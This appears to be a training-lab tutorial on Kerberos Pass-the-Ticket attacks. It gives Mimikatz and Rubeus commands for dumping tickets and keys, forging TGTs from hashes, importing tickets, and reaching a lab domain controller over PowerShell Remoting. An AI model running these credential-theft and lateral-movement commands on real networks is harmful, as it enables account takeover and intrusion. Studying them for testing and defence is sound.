Pass the Ticket (PtT) from Windows
Harvesting Kerberos Tickets from Windows
Rubeus - Export Tickets
Rubeus.exe dump /nowrapMimikatz - Export Tickets
mimikatz.exeprivilege::debugsekurlsa::tickets /exportexitThe tickets that end with
$correspond to the computer account, which needs a ticket to interact with the Active Directory.User tickets have the user's name,
followed by an
@that separates the service name and the domain, for example:[randomvalue][email protected].
We can also export tickets using Rubeus and the option dump
This option can be used to dump all tickets (if running as a local administrator).
Rubeus dump, instead of giving us a file, will print the ticket encoded in base64 format. We are adding the option/nowrapfor easier copy-paste.
Another advantage of abusing Kerberos tickets is the ability to forge our own tickets. Let's see how we can do this using the
OverPass the Hash or Pass the Keytechnique.
Pass the Key or OverPass the Hash
The traditional
Pass the Hash (PtH)technique involves reusing an NTLM password hash that doesn't touch KerberosThe
Pass the KeyorOverPass the Hashapproach converts a hash/key (rc4_hmac, aes256_cts_hmac_sha1, etc.) for a domain-joined user into a fullTicket-Granting-Ticket (TGT).technique was developed by Benjamin Delpy and Skip Duckwall in their presentation Abusing Microsoft Kerberos - Sorry you guys don't get it
To forge our tickets, we need to have the user's hash
we can use Mimikatz to dump all users Kerberos encryption keys using the module
sekurlsa::ekeys
Mimikatz - Extract Kerberos Keys
mimikatz.exe
privilege::debug
sekurlsa::ekeysMimikatz - Pass the Key or OverPass the Hash
mimikatz.exe
privilege::debug
sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50fRubeus - Pass the Key or OverPass the Hash
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:b21c99fc068e3ab2ca789bccbef67de43791fd911c6e15ead25641a8fda3fe60 /nowrapPass the Ticket (PtT)
Rubeus Pass the Ticket
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:3f74aa8f08f712f09cd5177b5c1ce50f /pttAnother way is to import the ticket into the current session using the .kirbi file from the disk.
Rubeus - Pass the Ticket
Rubeus.exe ptt /ticket:[0;6c680][email protected]Convert .kirbi to Base64 Format
[Convert]::ToBase64String([IO.File]::ReadAllBytes("[0;6c680][email protected]"))Using Rubeus, we can perform a Pass the Ticket providing the base64 string instead of the file name.
Pass the Ticket - Base64 Format
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIID7aADAgEFoQkbB0hUQi5DT02iHDAaoAMCAQKhEzARGwZrcmJ0Z3QbB2h0Yi5jb22jggO7MIIDt6ADAgESoQMCAQKiggOpBIIDpY8Kcp4i71zFcWRgpx8ovymu3HmbOL4MJVCfkGIrdJEO0iPQbMRY2pzSrk/gHuER2XRLdV/<SNIP>Mimikatz - Pass the Ticket
mimikatz.exe
privilege::debug
kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680][email protected]"dir \\DC01.inlanefreight.htb\c$Pass The Ticket with PowerShell Remoting (Windows)
PowerShell Remoting allows us to run scripts or commands on a remote computer.
Administrators often use PowerShell Remoting to manage remote computers on the network
Enabling PowerShell Remoting creates both HTTP and HTTPS listeners.
The listener runs on standard port TCP/5985 for HTTP and TCP/5986 for HTTPS.
To create a PowerShell Remoting session on a remote computer, you must have administrative permissions, be a member of the Remote Management Users group, or have explicit PowerShell Remoting permissions in your session configuration.
Suppose we find a user account that doesn't have administrative privileges on a remote computer but is a member of the Remote Management Users group. In that case, we can use PowerShell Remoting to connect to that computer and execute commands.
Mimikatz - PowerShell Remoting with Pass the Ticket
mimikatz.exeprivilege::debugkerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a][email protected]"exitpowershellEnter-PSSession -ComputerName DC01[DC01]: PS C:\Users\john\Documents> whoami[DC01]: PS C:\Users\john\Documents> hostnameRubeus - PowerShell Remoting with Pass the Ticket
Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /showThe above command will open a new cmd window.
From that window, we can execute Rubeus to request a new TGT with the option
/pttto import the ticket into our current session and connect to the DC using PowerShell Remoting.
Rubeus - Pass the Ticket for Lateral Movement
Rubeus.exe asktgt /user:john /domain:inlanefreight.htb /aes256:9279bcbd40db957a0ed0d3856b2e67f9bb58e6dc7fc07207d0763ce2713f11dc /pttpowershellEnter-PSSession -ComputerName DC01[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john
Last updated